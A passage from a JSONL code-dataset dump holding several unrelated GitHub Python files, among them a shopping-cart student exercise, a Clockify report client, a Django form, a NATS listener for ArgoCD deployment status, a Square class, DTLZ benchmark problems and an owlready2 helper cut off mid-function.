474):\n return True\n\n #[682, 474], [682, 304]\n if ((682-5) <= arr[0] <= (682+5)) and (304 <= arr[1] <= 474):\n return True\n #[281, 69], [281, 231]\n if ((281-5) <= arr[0] <= (281+5)) and (69 <= arr[1] <= 231):\n return True\n\n #[541, 69], [541, 231]\n if ((541-5) <= arr[0] <= (541+5)) and (69 <= arr[1] <= 231):\n return True\n return False\n\nif __name__ == \"__main__\":\n arr = [59,268]\n img = getDisplay(arr)\n key = 100\n\n while True:\n done = False\n cv.imshow(\"The Bird Dot game\", img)\n #key = cv.waitKey(0)\n if 
key == ord('a'):\n arr[0] = arr[0] - 5\n elif key == ord('d'):\n arr[0] = arr[0] + 5\n elif key == ord('w'):\n arr[1] = arr[1] - 5\n elif key == ord('s'):\n arr[1] = arr[1] + 5\n elif key == ord('e'):\n arr[0] = arr[0] + 5\n arr[1] = arr[1] - 5\n elif key == ord('z'):\n arr[0] = arr[0] + 5\n arr[1] = arr[1] + 5\n elif key == ord('q'):\n break\n\n if dtCollisionBoundaries(arr) == True:\n print(\"Collided\")\n break\n if dtDestination(arr) == True:\n print(\"Reached destination\")\n break\n if collisionWithHind(arr) == True:\n print(\"Collided with hinderance\")\n break\n img = getDisplay(arr)\n k = cv.waitKey(400)\n if k != -1:\n key = copy.deepcopy(k)","repo_name":"ajithvallabai/RL001","sub_path":"Lesson_01_DotsAndLines/basic_games/bird.py","file_name":"bird.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43771049851","text":"import sys\nitem_list = list()\nitem_price = list()\nitem_quantity = list()\namount_list = list()\ncounter_list = list()\nmanage_cart = True\naddin_item_dashboard = True\ntotal = 0\nposition = 0\ntotal_amount = 0\n\nprint('Welcome to the Shopping Cart Program!')\nprint('')\nwhile manage_cart == True:\n\n print(\"\"\"Please select one of the following:\n 1. Add item\n 2. View cart\n 3. Modify cart quantities\n 4. Compute total\n 5. Remove item\n 6. Clear Cart\n 7. Quit\"\"\")\n\n enter_action = int(input('Please enter an action: '))\n if enter_action == 1:\n while addin_item_dashboard == True:\n \n item = str(input('Enter item to add: '))\n if item.capitalize() in item_list:\n print('The item is already in the cart')\n addin_item_dashboard = True\n break\n else:\n item_list.append(item.capitalize())\n\n price = float(input('Enter item price: '))\n item_price.append(price)\n add_quantity = float(input('Enter item quantity: '))\n item_quantity.append(add_quantity)\n amount = price*add_quantity\n amount_list.append(amount)\n print()\n print(f'* {item.capitalize()} * has been added to the cart')\n\n continue_adding_items = input('Do you want to continue adding items to the cart? [YES or NO]: ')\n\n if continue_adding_items == 'yes':\n addin_item_dashboard = True\n else:\n addin_item_dashboard = False\n break\n \n elif enter_action == 2:\n print('The contents of the shopping cart are:')\n print(\"+------------+--------------------+------------+-------------+-----------+\")\n print(\"|ITEM NUMBER |ITEM |QTY. |PRICE |AMOUNT |\")\n print(\"+------------+--------------------+------------+-------------------------+\")\n counter = 1 \n for a, b, c, d in zip (item_list, item_quantity, item_price, amount_list):\n \n print(\"| {:10}|{:<20}|{:>12.2f}|${:>12.2f}|${:>10.2f}|\".format(counter, a, b, c, d))\n counter += 1\n \n \n print(\"+------------+--------------------+------------+-------------------------+\")\n \n total = 0\n total_amount = 0\n\n for amount in amount_list:\n total += amount\n total_amount += 1\n \n print(\"|------------|--------------------|------------|TOTAL: |${:>10.2f}|\".format(total))\n print(\"+------------+--------------------+------------+-------------------------+\")\n\n elif enter_action == 3:\n \n index = int(input(\"What quantity index do you want to update? \"))\n new_qty = int(input(\"What is the new quantity? 
\"))\n\n item_quantity[index] = new_qty\n if new_qty >= 0:\n amount_list[index] = item_price[index]*new_qty\n\n total = 0\n total_amount = 0\n\n for amount in amount_list:\n total += amount\n total_amount += 1\n\n print('\\nQuantity updated successfully!')\n \n ##############################################################################\n # New Quantity purchase\n ##############################################################################\n\n print('\\nThe new contents of the shopping cart are:')\n print(\"+------------+--------------------+------------+-------------+-----------+\")\n print(\"|ITEM NUMBER |ITEM |QTY. |PRICE |AMOUNT |\")\n print(\"+------------+--------------------+------------+-------------------------+\")\n counter = 1 \n for a, b, c, d in zip (item_list, item_quantity, item_price, amount_list):\n \n print(\"| {:10}|{:<20}|{:>12.2f}|${:>12.2f}|${:>10.2f}|\".format(counter, a, b, c, d))\n counter += 1\n \n \n print(\"+------------+--------------------+------------+-------------------------+\")\n print(\"|------------|--------------------|------------|TOTAL: |${:>10.2f}|\".format(total))\n print(\"+------------+--------------------+------------+-------------------------+\")\n \n ################################################################################ \n \n elif enter_action == 4:\n\n total = 0\n total_amount = 0\n\n for amount in amount_list:\n total += amount\n total_amount += 1\n \n print(f'The total price of the items in the shopping cart is ${total:.2f}')\n print()\n\n elif enter_action == 5:\n delete_item = input('Enter the number of the item to delete: ')\n print()\n if delete_item.isdigit() and int(delete_item) <= counter:\n position = int(delete_item) - 1\n del item_list[position]\n del item_price[position]\n del item_quantity[position]\n del amount_list[position]\n \n print(f'* {delete_item} * deleted successfully')\n else:\n print('The article does not exist')\n print()\n\n elif enter_action == 6:\n delete_all = input('Are you sure you want to remove all items from the cart? [YES or NO]: ')\n delete_all = delete_all.lower()\n\n if delete_all == 'yes':\n item_list = []\n item_quantity = []\n item_price = []\n amount_list = []\n \n manage_cart == True\n \n elif enter_action == 7:\n user_exit = input('Are you sure you want to exit the cart? [YES or NO]: ')\n user_exit = user_exit.lower()\n if user_exit == 'yes':\n sys.exit('Thank you. Goodbye.')\n else:\n manage_cart = True\n \n else:\n print('Invalid input error, please enter a number between 1 and 7')\n print()\n manage_cart == True","repo_name":"FernandoDCardozoBraga/CSE110","sub_path":"w10/w10_prove_assignment.py","file_name":"w10_prove_assignment.py","file_ext":"py","file_size_in_byte":5921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71914452712","text":"import logging\n\nfrom clockify_api_client.abstract_clockify import AbstractClockify\n\n\nclass Report(AbstractClockify):\n def __init__(self, api_key, api_url):\n super(Report, self).__init__(api_key=api_key, api_url=api_url)\n self.base_url = f'https://reports.{api_url}'.strip('/')\n\n def get_summary_report(self, workspace_id, payload):\n \"\"\"Calls Clockify API for summary report. 
Returns summary report object (Dictionary)\n :param workspace_id: Id of workspace for report.\n :param payload: Body of request for summary report.\n :return: Dictionary with summary report.\n \"\"\"\n try:\n url = self.base_url + '/workspaces/' + workspace_id + '/reports/summary/'\n return self.post(url, payload)\n except Exception as e:\n logging.error(\"API error: {0}\".format(e))\n raise e\n\n def get_detailed_report(self, workspace_id, payload):\n \"\"\"Calls Clockify API for detailed report. Returns detailed report object (Dictionary)\n :param workspace_id: Id of workspace for report.\n :param payload: Body of request for detailed report.\n :return: Dictionary with detailed report.\n \"\"\"\n try:\n url = self.base_url + '/workspaces/' + workspace_id + '/reports/detailed/'\n return self.post(url, payload)\n except Exception as e:\n logging.error(\"API error: {0}\".format(e))\n raise e\n\n def get_weekly_report(self, workspace_id, payload):\n \"\"\"Calls Clockify API for weekly report. Returns weekly report object (Dictionary)\n :param workspace_id: Id of workspace for report.\n :param payload: Body of request for weekly report.\n :return: Dictionary with weekly report.\n \"\"\"\n try:\n url = self.base_url + '/workspaces/' + workspace_id + '/reports/weekly/'\n return self.post(url, payload)\n except Exception as e:\n logging.error(\"API error: {0}\".format(e))\n raise e\n","repo_name":"group-eluvia-com/clockify-api-client","sub_path":"clockify_api_client/models/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"28342312570","text":"from django import forms\n\nfrom accounts.models import User\n\n\nclass AccountUpdateForm(forms.ModelForm):\n class Meta:\n model = User\n fields = [\n \"email\",\n \"phone\",\n \"bio\",\n \"first_name\",\n \"last_name\",\n ]\n\n def clean_email(self):\n email = self.cleaned_data[\"email\"].lower()\n try:\n user = User.objects.exclude(username=self.instance.username).get(\n email=email\n )\n except User.DoesNotExist:\n return email\n raise forms.ValidationError('Email \"%s\" is already in use.' 
% email)\n\n def save(self, commit=True):\n profile = super(AccountUpdateForm, self).save(commit=False)\n profile.email = self.cleaned_data[\"email\"].lower()\n profile.phone = self.cleaned_data[\"phone\"]\n profile.bio = self.cleaned_data[\"bio\"]\n profile.first_name = self.cleaned_data[\"first_name\"]\n profile.last_name = self.cleaned_data[\"last_name\"]\n if commit:\n profile.save()\n return profile\n","repo_name":"Masoudvahid/SocialNetworkingSite","sub_path":"profiles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26506288035","text":"mystring = 'Hello'\nmylist = []\n\n#1 way\n# for letter in mystring:\n# mylist.append(letter)\n# print(letter)\n\n#2 way\n\n#The comprehension below puts each letter into the list\nmylist = [letter for letter in mystring]\nprint(mylist)\n\n#This below puts each number in the range into the list, mylist2\nmylist2 = [num for num in range(0,10)]\nprint(mylist2)\n\n#This below puts only the even numbers from the range into the num_list list\nnum_list = [num for num in range(0,10) if num % 2 == 0]\nprint(num_list)\n\n#temperature conversion from celsius into fahrenheit\n\ncelsius = [0, 10, 20, 34.5]\n\nfahrenheit = [( (9/5)*temp + 32) for temp in celsius]\n\nprint(fahrenheit)","repo_name":"rbdjur/Python","sub_path":"Practice_Modules/Python_Statements/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31600637114","text":"# number guessing game\r\n\r\nimport random\r\n\r\nuser_input_number = input(\"Up to where do you want to guess: \")\r\n\r\nif user_input_number.isdigit():\r\n user_input_number = int(user_input_number)\r\nelse:\r\n print(\"Please enter a number next time\")\r\n quit()\r\n\r\n\r\nrandom_number = random.randint(0, user_input_number)\r\nguesses = 0\r\n\r\n\r\nwhile True:\r\n guesses += 1\r\n user_guess = input(\"make a guess > \")\r\n if user_guess.isdigit():\r\n user_guess = int(user_guess)\r\n else:\r\n print(\"Please type a number next time\")\r\n continue\r\n\r\n if user_guess == random_number:\r\n print(\"Congratulations! 
you got it right\")\r\n break\r\n elif user_guess > random_number:\r\n print(\"You're guessing too high\")\r\n else:\r\n print(\"You're guessing too low\")\r\n\r\nprint(f\"You got the right answer in {guesses} guesses\")\r\n","repo_name":"SahilGoyal9598/beginner-projects","sub_path":"number_guesser.py","file_name":"number_guesser.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5757844596","text":"import sys\nimport argparse\nimport json\nimport base64\nimport asyncio\nimport nats\nimport stan\nimport os\nimport time\nfrom nats.errors import ConnectionClosedError, TimeoutError, NoServersError\nfrom nats.aio.client import Client as NATS\nfrom stan.aio.client import Client as STAN\nfrom kubernetes import client, config\nfrom kubernetes.client.rest import ApiException\nimport urllib3\nurllib3.disable_warnings()\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-p', '--project', help='argocd project name', required=True)\nparser.add_argument('-a', '--application', help='argocd application name', required=True)\nparser.add_argument('-c', '--commit', help='commit SHA', required=True)\nparser.add_argument('-t', '--timeout', help='maximum time to wait in seconds', required=True)\nparser.add_argument('-n', '--namespace', help='namespace containing eventbus', required=True)\nparser.add_argument('-e', '--eventbus', help='eventbus name', required=False)\nparser.add_argument('-k', '--kubeconfig', help='the path to kubeconfig', required=False)\nparser.add_argument('-r', '--resultpath', help='the path to task result', required=True)\nargs = parser.parse_args()\n\neventbus = args.eventbus\nif not eventbus:\n eventbus = \"default\"\nns = args.namespace\ntimeout = int(args.timeout)\nproject_name = args.project\napp_name = args.application\ncommit = args.commit\nresult_path = args.resultpath\nstep = 2\nexit_code = -1\n\nasync def main():\n nc = NATS()\n options = get_nats_connection_options()\n await nc.connect(**options)\n\n sc = STAN()\n cluster_id = \"eventbus-\" + eventbus\n client_id = \"client-\" + str(int(time.time()))\n print(\"connect to {} by {}\".format(cluster_id, client_id))\n await sc.connect(cluster_id, client_id, nats=nc)\n\n async def message_handler(msg):\n eventJson = msg.data.decode('utf-8')\n event = json.loads(eventJson)\n if event['type'] != \"webhook\" or event['subject'] != \"deployments-status\":\n print(\"received a invalid message, type: {}, subject: {}\".format(event['type'], event['subject']))\n return\n\n dataJson = base64.b64decode(event['data_base64'])\n data = json.loads(dataJson)\n body = data['body']\n\n if body['project'] == project_name and body['application'] == app_name and body['revision'] == commit:\n print(\"received a valid message, data:\")\n print(data)\n global exit_code\n phase = body['phase']\n sync_status = body['sync_status']\n healthy = body['healthy']\n url = body['url']\n if phase == \"Succeeded\" and healthy == \"Healthy\":\n with open(result_path, mode='w', encoding='utf-8') as result:\n result.write(url)\n exit_code = 0\n elif phase == \"Failed\" or phase == \"Error\":\n exit_code = 1\n else: \n print(\"deployment in progressing..., phase:{}, sync_status:{}, healthy:{}\".format(phase, sync_status, healthy))\n else:\n print(\"received a invalid message, project: {}, application: {}, revision: {}\".format(body['project'], body['application'], body['revision']))\n\n async def error_handler(error):\n print(\"error: \" + error)\n global 
exit_code\n exit_code = 1\n\n subject = \"eventbus-\" + ns\n sub = await sc.subscribe(subject = subject, cb = message_handler, start_at = 0, error_cb = error_handler)\n print(\"Listening for '{}/{}' ...\".format(project_name, app_name))\n\n count = int(timeout/step)\n for i in range(1, count):\n await asyncio.sleep(step)\n if exit_code >= 0:\n await exit(sub, nc, exit_code)\n print(\"timeout and exit: \" + str(timeout) + \"s\")\n await exit(sub, nc, 1)\n\nasync def exit(sub, nc, exit_code):\n await sub.unsubscribe()\n await nc.drain()\n sys.exit(exit_code)\n\ndef get_nats_connection_options():\n if args.kubeconfig:\n config.load_kube_config(config_file=args.kubeconfig)\n else:\n config.load_incluster_config()\n v1api = client.CoreV1Api()\n custom_object_api = client.CustomObjectsApi()\n\n eventbus_pods = v1api.list_namespaced_pod(namespace=ns, label_selector=\"eventbus-name=\" + eventbus)\n servers = []\n for eventbus_pod in eventbus_pods.items:\n pod_ip = eventbus_pod.status.pod_ip\n servers.append(\"nats://{}:4222\".format(pod_ip))\n\n secret_name = \"eventbus-\" + eventbus + \"-client\"\n eventbus_client_secret = v1api.read_namespaced_secret(name=secret_name, namespace=ns)\n token_kv_base64 = eventbus_client_secret.data['client-auth']\n token_kv = base64.b64decode(token_kv_base64)\n token = token_kv.split(b':')[1].replace(b\"\\\"\", b\"\").decode('utf-8').strip()\n options = {\"servers\": servers, \"token\": token}\n return options\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"nautes-labs/demo-bot","sub_path":"nautes-listener.py","file_name":"nautes-listener.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36415946848","text":"#!/usr/bin/python3\n\"\"\"A module with definition of a class `Square`\"\"\"\n\n\nclass Square:\n \"\"\"A class that defines a square by private, public instance attribute\n \"\"\"\n\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"Initializes the intance attribute and raises exception if error\n\n Args:\n size (int): Size of the square\n position (tuple): A tuple of two positive number for x and y axis\n \"\"\"\n Square.check_size(size)\n self.__size = size\n\n Square.check_pos(position)\n self.__position = position\n\n @property\n def size(self):\n \"\"\":obj:`int`: Current size of the square\n\n The setter method raises an exception if the value is not int or < 0\n \"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n Square.check_size(value)\n self.__size = value\n\n def area(self):\n \"\"\"Method that returns the current area of the square\"\"\"\n return self.__size ** 2\n\n @property\n def position(self):\n \"\"\":obj:`tuple` of :obj:`int`: index 0 sets spaces and 1 sets newline\n\n The setter method raises an exception of ValueError or TypeError\n \"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n Square.check_pos(value)\n self.__position = value\n\n def my_print(self):\n \"\"\"Prints the square using `#` signs\"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__position[1]):\n print()\n for i in range(self.__size):\n print(\" \" * self.__position[0] + \"#\" * self.__size)\n\n def __str__(self):\n \"\"\"Returns the square made using `#` signs\"\"\"\n\n sq_str = \"\"\n if self.__size == 0:\n return sq_str\n else:\n x, y = self.__position\n\n for _ in range(y):\n sq_str = sq_str + \"\\n\"\n\n for _ in range(self.__size):\n if x:\n sq_str = sq_str + (' ' * 
x)\n sq_str += ('#' * self.__size) + '\\n'\n sq_str = sq_str[:-1]\n return sq_str\n\n @staticmethod\n def check_size(size):\n \"\"\"Checks if the size passed to class Square is valid\n\n Args:\n size (int): The size of the square at a given instance\n \"\"\"\n\n if type(size) != int:\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n\n @staticmethod\n def check_pos(position):\n \"\"\"Checks if the position passed to class Square is valid\n\n Args:\n position: The position at which the square should be printed\n \"\"\"\n\n if type(position) != tuple or len(position) != 2 \\\n or type(position[0]) != int or type(position[1]) != int \\\n or position[0] < 0 or position[1] < 0:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n","repo_name":"chee-zaram/alx-higher_level_programming","sub_path":"0x06-python-classes/101-square.py","file_name":"101-square.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73826050152","text":"import autograd.numpy as anp\n\nfrom pymop.problem import Problem\nimport numpy as np\n\n\nclass DTLZ(Problem):\n def __init__(self, n_var, n_obj, k=None):\n\n if n_var:\n self.k = n_var - n_obj + 1\n elif k:\n self.k = k\n n_var = k + n_obj - 1\n else:\n raise Exception(\"Either provide number of variables or k!\")\n\n super().__init__(n_var=n_var, n_obj=n_obj, n_constr=0, xl=0, xu=1, type_var=anp.double)\n\n def g1(self, X_M):\n return 1 * (self.k + anp.sum(anp.square(X_M - 0.5) - anp.cos(2 * anp.pi * (X_M - 0.5)), axis=1))\n\n def g2(self, X_M):\n return anp.sum(anp.square(X_M - 0.5), axis=1)\n\n def obj_func(self, X_, g, alpha=1):\n f = []\n\n for i in range(0, self.n_obj):\n _f = (1 + g)\n _f *= anp.prod(anp.cos(anp.power(X_[:, :X_.shape[1] - i], alpha) * anp.pi / 2.0), axis=1)\n if i > 0:\n _f *= anp.sin(anp.power(X_[:, X_.shape[1] - i], alpha) * anp.pi / 2.0)\n\n f.append(_f)\n\n f = anp.column_stack(f)\n return f\n\n\ndef generic_sphere(ref_dirs):\n return ref_dirs / anp.tile(anp.linalg.norm(ref_dirs, axis=1)[:, None], (1, ref_dirs.shape[1]))\n\n\nclass DTLZ1(DTLZ):\n def __init__(self, n_var=7, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self, ref_dirs=None):\n return 0.5 * ref_dirs\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = self.g1(X_M)\n\n f = []\n for i in range(0, self.n_obj):\n _f = 0.5 * (1 + g)\n _f *= anp.prod(X_[:, :X_.shape[1] - i], axis=1)\n if i > 0:\n _f *= 1 - X_[:, X_.shape[1] - i]\n f.append(_f)\n\n out[\"F\"] = anp.column_stack(f)\n\n\nclass DTLZ2(DTLZ):\n def __init__(self, n_var=10, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self, ref_dirs):\n return generic_sphere(ref_dirs)\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = self.g2(X_M)\n out[\"F\"] = self.obj_func(X_, g, alpha=1)\n\n\nclass DTLZ3(DTLZ):\n def __init__(self, n_var=10, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self, ref_dirs):\n return generic_sphere(ref_dirs)\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = self.g1(X_M)\n out[\"F\"] = self.obj_func(X_, g, alpha=1)\n\n\nclass DTLZ4(DTLZ):\n def __init__(self, n_var=10, n_obj=3, alpha=100, d=100, **kwargs):\n 
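Aside on the Square record above (101-square.py): a short usage sketch, assuming the class is importable as defined; the expected outputs in the comments follow directly from __str__ and the size/position setters:

s = Square(3, (2, 1))
print(s.size)        # 3
print(s.area())      # 9
print(s)             # one leading blank line, then three rows of '  ###'
s.size = 0
print(repr(str(s)))  # '' -- a zero-size square renders as an empty string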
super().__init__(n_var, n_obj, **kwargs)\n self.alpha = alpha\n self.d = d\n\n def _calc_pareto_front(self, ref_dirs):\n return generic_sphere(ref_dirs)\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = self.g2(X_M)\n out[\"F\"] = self.obj_func(X_, g, alpha=self.alpha)\n\n\nclass DTLZ5(DTLZ):\n def __init__(self, n_var=10, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self, n_pareto_points=100):\n # raise Exception(\"Not implemented yet.\")\n p1 = np.atleast_2d(np.arange(0, 1 + 1/n_pareto_points, 1/(n_pareto_points-1))).reshape(-1, 1)\n p2 = np.atleast_2d(np.arange(1, 0-1/n_pareto_points, -1/(n_pareto_points-1))).reshape(-1, 1)\n p = np.hstack((p1, p2))\n p3 = np.atleast_2d(np.sqrt(np.sum(p**2, axis=1))).reshape(-1, 1)\n p3 = np.repeat(p3, p.shape[1], axis=1)\n p = p/p3\n # p = np.hstack((p[:, ]))\n a = 0\n if self.n_obj - 2 > 0:\n select_columes = list(map(int, np.zeros(self.n_obj-2)))\n p = np.hstack((p[:, select_columes], p))\n n_p = len(p) ## number of rows\n p4 = [self.n_obj-2]\n p4 = np.append(p4, np.arange(self.n_obj - 2, -0.01, -1))\n p4 = np.repeat(np.atleast_2d(p4), n_p, axis=0)\n p = p/np.sqrt(2)**p4\n return p\n\n\n\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = self.g2(X_M)\n\n theta = 1 / (2 * (1 + g[:, None])) * (1 + 2 * g[:, None] * X_)\n theta = anp.column_stack([x[:, 0], theta[:, 1:]])\n\n out[\"F\"] = self.obj_func(theta, g)\n\n\nclass DTLZ6(DTLZ):\n def __init__(self, n_var=10, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self):\n raise Exception(\"Not implemented yet.\")\n\n def _evaluate(self, x, out, *args, **kwargs):\n X_, X_M = x[:, :self.n_obj - 1], x[:, self.n_obj - 1:]\n g = anp.sum(anp.power(X_M, 0.1), axis=1)\n\n theta = 1 / (2 * (1 + g[:, None])) * (1 + 2 * g[:, None] * X_)\n theta = anp.column_stack([x[:, 0], theta[:, 1:]])\n\n out[\"F\"] = self.obj_func(theta, g)\n\n\nclass DTLZ7(DTLZ):\n def __init__(self, n_var=10, n_obj=3, **kwargs):\n super().__init__(n_var, n_obj, **kwargs)\n\n def _calc_pareto_front(self, n_pareto_points=100):\n interval = [0, 0.251412, 0.631627, 0.859401]\n median = (interval[1]-interval[0])/(interval[3]-interval[2]+interval[1]-interval[0])\n X = self._replicatepoint(n_pareto_points, self.n_obj-1)\n X[X <= median] = X[X <= median]*(interval[1]-interval[0])/median+interval[0]\n X[X > median] = (X[X > median] - median) * (interval[3]-interval[2])/(1-median)+interval[2]\n p2 = 2 * (self.n_obj - np.sum(X/2 * (1 + np.sin(3 * np.pi * X)), axis=1))\n p2 = np.atleast_2d(p2).reshape(-1, 1)\n p = np.hstack((X, p2))\n return p\n\n\n\n def _replicatepoint(self, sample_num, M):\n if M > 1 and M < 3:\n sample_num = np.ceil(sample_num**(1/M))**M\n gap = np.arange(0, 1 + 1e-7, 1/(sample_num**(1/M)-1))\n c1, c2 = np.meshgrid(gap, gap, indexing='ij')\n W = np.hstack((np.atleast_2d(c1.flatten(order='F')).reshape(-1, 1),\n np.atleast_2d(c2.flatten(order='F')).reshape(-1, 1)))\n\n elif M == 1:\n W = np.arange(0, 1 + 1e-5, 1/(sample_num-1))\n W = np.atleast_2d(W).reshape(-1, 1)\n\n else:\n raise(\n \"for number objectives greater than 3, not implemented\"\n )\n return W\n\n\n\n\n def _evaluate(self, x, out, *args, **kwargs):\n f = []\n for i in range(0, self.n_obj - 1):\n f.append(x[:, i])\n f = anp.column_stack(f)\n\n g = 1 + 9 / self.k * anp.sum(x[:, -self.k:], axis=1)\n h = self.n_obj - anp.sum(f / (1 + g[:, None]) * (1 + anp.sin(3 * 
anp.pi * f)), axis=1)\n\n out[\"F\"] = anp.column_stack([f, (1 + g) * h])\n\n\nclass ScaledProblem(Problem):\n\n def __init__(self, problem, scale_factor):\n super().__init__(n_var=problem.n_var, n_obj=problem.n_obj, n_constr=problem.n_constr,\n xl=problem.xl, xu=problem.xu, type_var=problem.type_var)\n self.problem = problem\n self.scale_factor = scale_factor\n\n @staticmethod\n def get_scale(n, scale_factor):\n return anp.power(anp.full(n, scale_factor), anp.arange(n))\n\n def evaluate(self, X, *args, **kwargs):\n t = self.problem.evaluate(X, **kwargs)\n F = t[0] * ScaledProblem.get_scale(self.n_obj, self.scale_factor)\n return tuple([F] + list(t)[1:])\n\n def _calc_pareto_front(self, *args, **kwargs):\n return self.problem.pareto_front(*args, **kwargs) * ScaledProblem.get_scale(self.n_obj, self.scale_factor)\n\n\nclass ConvexProblem(Problem):\n\n def __init__(self, problem):\n super().__init__(problem.n_var, problem.n_obj, problem.n_constr, problem.xl, problem.xu)\n self.problem = problem\n\n @staticmethod\n def get_power(n):\n p = anp.full(n, 4.0)\n p[-1] = 2.0\n return p\n\n def evaluate(self, X, *args, **kwargs):\n t = self.problem.evaluate(X, **kwargs)\n F = anp.power(t[0], ConvexProblem.get_power(self.n_obj))\n return tuple([F] + list(t)[1:])\n\n def _calc_pareto_front(self, ref_dirs, *args, **kwargs):\n F = self.problem.pareto_front(ref_dirs)\n return anp.power(F, ConvexProblem.get_power(self.n_obj))\n\n\n\nif __name__ == \"__main__\":\n pro = DTLZ7(n_var=6, n_obj=2)\n print(pro.name())\n y = pro.pareto_front(n_pareto_points=40)\n print(y)\n\n # bj = pro.evaluate(x)\n # print(obj)","repo_name":"arielBWong/EGO","sub_path":"surrogate_problems/DTLZs.py","file_name":"DTLZs.py","file_ext":"py","file_size_in_byte":8511,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73370613352","text":"import json\nimport os\nimport math\nimport pprint\nfrom owlready2 import *\n\nis_debug = False\n\n\ndef get_label(x):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\t# sync_reasoner()\n\tis_str = isinstance(x, str)\n\n\tif x.name != None:\n\t\tif hasattr(x, '_label'):\n\t\t\treturn x._label[0]\n\t\telif hasattr(x, '_name'):\n\t\t\treturn x._name\n\telif is_str:\n\t\tif 'webprotege' in x:\n\t\t\tx = str(x)\n\t\t\t_id = x.split('.')[3]\n\t\t\treturn obo[_id].label[0]\n\t\telse: \n\t\t\treturn x.split('.')[1]\n\ndef get_classes():\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = get_ontology(\"Shared6.owl\").load()\n\tobo = get_namespace(\"http://webprotege.stanford.edu/project/xpUFBIdmzwyCPpbfIg4hh\")\n\tsync_reasoner()\n\n\tclasses = []\n\tfor x in list(onto.classes()):\n\t\tx = str(x)\n\t\tclass_name = \"\"\n\t\tif 'webprotege' in x:\n\t\t\tclass_name = get_label(x)\n\t\t### web version only\n\t\t# else: # ont1\n\t\t# \t_id = x.split('.')[1]\n\t\t# \tclass_name = _id\n\t\telse: \n\t\t\tclass_name = x.split('.')[1]\n\n\t\tclasses.append(class_name)\n\treturn classes\n\ndef get_subclasses_recur(class_id, is_IRIS = False):\n\tonto = None\n\tif is_debug:\n\t\tonto = get_ontology(\"E:\\\\Homework\\\\Intelligent Agents\\\\PartPicker\\\\Shared6.owl\").load()\n\telse:\n\t\tonto = 
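Aside on the DTLZ record above: for DTLZ2 (alpha=1, no theta transform), setting every distance variable to 0.5 makes g2 vanish, so the objectives land exactly on the unit sphere. A standalone numpy check of that property, mirroring the g2/obj_func math without depending on pymop (variable names are illustrative):

import numpy as np

n_var, n_obj = 10, 3
x = np.full((1, n_var), 0.5)       # distance part at 0.5 -> g = 0
x[0, :n_obj - 1] = [0.2, 0.7]      # arbitrary position variables

X_, X_M = x[:, :n_obj - 1], x[:, n_obj - 1:]
g = np.sum(np.square(X_M - 0.5), axis=1)  # == 0 here

f = []
for i in range(n_obj):
    _f = (1 + g) * np.prod(np.cos(X_[:, :X_.shape[1] - i] * np.pi / 2), axis=1)
    if i > 0:
        _f = _f * np.sin(X_[:, X_.shape[1] - i] * np.pi / 2)
    f.append(_f)
F = np.column_stack(f)

# sum_i f_i^2 == (1 + g)^2, so g == 0 puts the point on the unit sphere
assert np.allclose(np.sum(F ** 2, axis=1), (1 + g) ** 2)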
